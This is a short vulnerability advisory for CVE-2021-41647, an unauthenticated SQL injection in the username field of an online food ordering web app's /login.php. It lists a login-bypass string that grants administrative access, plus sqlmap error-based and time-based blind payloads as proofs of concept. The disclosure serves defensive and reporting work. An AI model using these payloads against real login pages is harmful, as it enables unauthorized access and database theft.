CVE-2021-41647 SQL Injection in Online-Food-Ordering-Web-App

The Online-Food-Ordering-Web-App is vulnerable to un-authenticated error and time-based blind SQL Injection attacks. The username parameter on the /login.php page does not sanitize the user input, an attacker is able to bypass the login using a simple bypass technique.
Link To Application

Online-Food-Ordering-Web-App
Affected Components & Parameter

URL: /login.php
PARAMETER: username
POC’S
LOGIN BYPASS PAYLOAD

To bypass the user login and gain full administrative access, payload in the username input field: user’ or 1=1– –
SQLMAP PAYLOADS

Parameter: username (POST Request) Type: error-based Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=test’||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||’&password=asdfasdrf

Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test’||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||’&password=asdfasdrf

Discovered by

Jason Colyvas
MOBIUSBINARY
September 20th, 2021